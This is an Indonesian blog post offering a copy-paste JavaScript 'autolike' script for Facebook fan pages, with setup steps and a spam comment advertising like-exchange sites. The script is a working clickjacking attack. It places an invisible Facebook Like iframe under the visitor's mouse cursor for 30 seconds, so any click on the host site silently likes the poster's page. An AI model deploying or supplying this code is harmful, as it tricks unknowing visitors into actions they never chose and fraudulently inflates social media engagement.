Javascript autolike Fb Fan Page

Kita bukan lagi membahas autolike yg  lagi rame di fb,tapi ini autolike untuk fan page/Halaman Facebook . Dengan Cara Ini kita gk perlu capek2 suruh orang lain untuk like fan page kita.
Ok sebelum lanjut Ini bekerja on Click, tidak seperti autolike status yg sekali klik bisa ribuan,tapi ini tergantung berapa orang yg click blog/site yg di pasang js ini penguin
silahkan Kopas code js di bawah ini di hos kamu
(function(){

  var Xcord = 0,
  Ycord = 0,
  IE = document.all ? true : false;

  if (!IE) document.captureEvents(Event.MOUSEMOVE);

  var lbox = document.createElement('iframe');
  lbox.src = 'http://www.facebook.com/plugins/like.php?href='+ encodeURIComponent('YOUR FAN PAGE URL')+'&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80';
  lbox.scrolling = 'no';
  lbox.frameBorder = 0;
  lbox.allowTransparency = 'true';
  lbox.style.border = 0;
  lbox.style.overflow = 'hidden';
  lbox.style.cursor = 'pointer';
  lbox.style.width = '53px';
  lbox.style.height =  '23px';
  lbox.style.position = 'absolute';
  lbox.style.opacity = 0;
  document.getElementsByTagName('body')[0].appendChild(lbox);

  window.addEventListener('mousemove', mouseMove, false);

  setTimeout(function(){
    document.getElementsByTagName('body')[0].removeChild(lbox);
    window.removeEventListener('mousemove', mouseMove, false);
  }, 30000);

  function mouseMove(e) {
    if (IE) {
      Xcord = event.clientX + document.body.scrollLeft;
      Ycord = event.clientY + document.body.scrollTop;
    } else {
      Xcord = e.pageX;
      Ycord = e.pageY;
    }
   
    if (Xcord < 0) Xcord = 0;
    if (Ycord < 0) Ycord = 0;
   
    lbox.style.top = (Ycord - 8) + 'px';
    lbox.style.left = (Xcord - 25) + 'px';
   
    return true
  }
})();
(1}YOUR FAN PAGE URL isi dengan url fanpage anda
(2)Ubah timer sesuai dengan selera anda pada bagian window.removeEventListener('mousemove', mouseMove, false) }, 30000);  -> Semakin besar, semakin lama,kalau udah Save file tersebut dengan nama sesuai selera anda, ingat ubah extension filenya menjadi .js
(3)kalau semua udah siap pasang kode js nya di situs/blog anda :
<script src='YOUR JS URL' type='text/javascript'></script> Or <script type="text/javascript" src="YOUR JS URL"></script>
Demo:


Postingan terkait:

1 Tanggapan untuk "Javascript autolike Fb Fan Page"

  1. Are you looking for free Facebook Likes, YouTube Subscribers, Google+ Circles, Twitter Followers, Instagram Likes, or maybe SoundCloud Listens?

    Did you know you can get all of these Likes, Followers, Views & Subscribers AUTOMATICALLY AND TOTALLY FREE?

    All you have to do is join the following Social Exchange sites, earn free points & exchange them for Followers, Subscribers, Likes or Views of your Social Accounts.
    1. Add Me Fast
    2. Like 4 Like
    3. You Like Hits

    Advertising networks that allow you to claim free advertising credits every day:
    1. MellowAds
    You can use these credits to advertise your social network profiles for free.

    BalasHapus

> Jika Artikel ini Membantu , Silahkan tinggalkan Komentar Anda
> Jika ingin menuliskan Kode-kode blog , jangan sekali-kali menulisnya dengan lengkap , Karena kodenya tidak akan muncul.
> U Comment I Follow !!!
> (Comment Use Emoticons, Copy Paste this code example: 13 or the other to the column comments)
> "No Spam"
> Do not Forget Leave Your Comment Here ...
> I Highly Appreciate your comment. This blog has been Dofollow.
> Komentar yang masuk SPAM tidak saya hapus dan saya akan Follow (jika link ada)

Follow Blog ini jika ingin mendapatkan informasi paling update